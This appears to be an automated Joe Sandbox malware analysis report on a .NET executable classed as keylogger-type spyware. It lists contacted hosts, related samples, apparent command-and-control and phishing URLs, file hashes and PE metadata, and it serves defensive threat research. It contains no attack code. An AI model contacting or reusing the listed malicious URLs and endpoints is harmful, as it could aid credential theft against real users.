                                                                                          https://reallyfreegeoip.org/xml/XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            149.154.167.220
                                                                                            		api.telegram.orgUnited Kingdom
                                                                                            		62041TELEGRAMRUfalse
                                                                                            104.21.96.1
                                                                                            		reallyfreegeoip.orgUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            132.226.247.73
                                                                                            		checkip.dyndns.comUnited States
                                                                                            		16989UTMEMUSfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                            Analysis ID:1632400
                                                                                            Start date and time:2025-03-07 23:21:17 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 8m 18s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:13
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:XFo9jVGyLQ.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 101
                                                                                            • Number of non-executed functions: 44
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.199.214.10
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            17:22:11API Interceptor11977407x Sleep call for process: XFo9jVGyLQ.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            149.154.167.22044zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                104.21.96.1A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                                                                                                • k1d5.icu/TP341/index.php
                                                                                                                DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.rbopisalive.cyou/2dxw/
                                                                                                                r_BBVA_MensajeSWIFT04-03-2025-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.kdrqcyusevx.info/k7wl/
                                                                                                                MUH030425.exeGet hashmaliciousAzorultBrowse
                                                                                                                • k1d5.icu/TP341/index.php
                                                                                                                Invoice Remittance ref20250226.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.rbopisalive.cyou/a669/
                                                                                                                368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
                                                                                                                PO.exeGet hashmaliciousLokibotBrowse
                                                                                                                • touxzw.ir/sccc/five/fre.php
                                                                                                                OEoRzjI7JgSiUUd.exeGet hashmaliciousLokibotBrowse
                                                                                                                • touxzw.ir/sss2/five/fre.php
                                                                                                                REQUEST FOR QUOTATION 2025.exeGet hashmaliciousFormBookBrowse
                                                                                                                • www.clouser.store/3r9x/
                                                                                                                http://verification-center-00225526.iwantfoundation.org/Get hashmaliciousUnknownBrowse
                                                                                                                • verification-center-00225526.iwantfoundation.org/banner-b1482d4c.webp
                                                                                                                132.226.247.7344zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                DayVXJx1km.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                cexqIzhyvM.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                drRbNknjyb.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/
                                                                                                                pkNnK2ya0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • checkip.dyndns.org/

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                reallyfreegeoip.org44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.64.1
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.64.1
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.48.1
                                                                                                                checkip.dyndns.com44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 158.101.44.242
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 193.122.6.168
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.247.73
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                api.telegram.org44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                • 149.154.167.220
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                TELEGRAMRU44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                g44YQtTyjN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                • 149.154.167.220
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                CLOUDFLARENETUS44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.112.1
                                                                                                                6KzB3ReZ6z.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 188.114.96.3
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                3JZ4CUFqSs.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 188.114.96.3
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.16.1
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                MmF9tcIj1J.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 104.21.87.37
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.80.1
                                                                                                                UTMEMUS44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.247.73
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                cqWZtEH4eJ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                axN56TZ3PI.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                AEo2XQmxqZ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.8.169
                                                                                                                l9inNHJqHS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                CWu89IbJQw.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                tSftorqHTy.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 132.226.247.73

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                54328bd36c14bd82ddaa0c04b25ed9ad44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                sWr3wJ0SuB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                BtCQu5APhK.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                lvrHOgPXr5.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                s6R3Xjt79e.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.21.96.1
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0e44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                OtldpQxzAw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                GuuQOl5kJR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                hUMdKouQ1H.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                ZWyrFp7WBM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XFo9jVGyLQ.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\XFo9jVGyLQ.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1216
                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                Malicious:true
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):7.760476071028119
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                File name:XFo9jVGyLQ.exe
                                                                                                                File size:773'120 bytes
                                                                                                                MD5:414a4cce996061c8f67088e96b9e5745
                                                                                                                SHA1:c6ed06b06aa148537fcc1ec9fcbb5f080519cea5
                                                                                                                SHA256:44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1
                                                                                                                SHA512:6cace3cc38c122d9e562f2d7398cfea5d0841db50f4c71d11fac96f53f8344527bcb921e15a5b29e9f5fffdebbc291fe1c06f9bc866a8ef661b69c5abaa71302
                                                                                                                SSDEEP:12288:tAbZWUBjSrr5FSRuSqwHLmPzdbXzBNdy7G3BW9DI1jh81bTDyRtl:mbYUUr5F+yPzffnQI1jhunDyrl
                                                                                                                TLSH:57F4F0D83B2AE716DD655A309A34EEB553A81DA8F000B9E35FCD3B87B9AD1015D0CF06
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............@................................

                                                                                                                File Icon

                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x4be0ba
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0xAD89030B [Wed Apr 5 04:39:39 2062 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add dword ptr [eax], eax
                                                                                                                add byte ptr [eax], al
                                                                                                                add al, byte ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add eax, dword ptr [eax]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbe0660x4f.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x5cc.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xbc4cc0x70.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x20000xbc0d00xbc20090677abad87969dd10bb52689618b20aFalse0.9098966985049833OpenPGP Public Key7.766159248335199IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0xc00000x5cc0x6004ff4c02944db9850ccb99516ab3ff4a8False0.4283854166666667data4.129833560060575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0xc20000xc0x2007f63e4c3a8801110f878642f1300ebb6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_VERSION0xc00900x33cdata0.42995169082125606
                                                                                                                RT_MANIFEST0xc03dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                mscoree.dll_CorExeMain

                                                                                                                Version Infos

                                                                                                                DescriptionData
                                                                                                                Translation0x0000 0x04b0
                                                                                                                Comments
                                                                                                                CompanyNameMicrosoft
                                                                                                                FileDescriptionCompiler Project
                                                                                                                FileVersion1.0.0.0
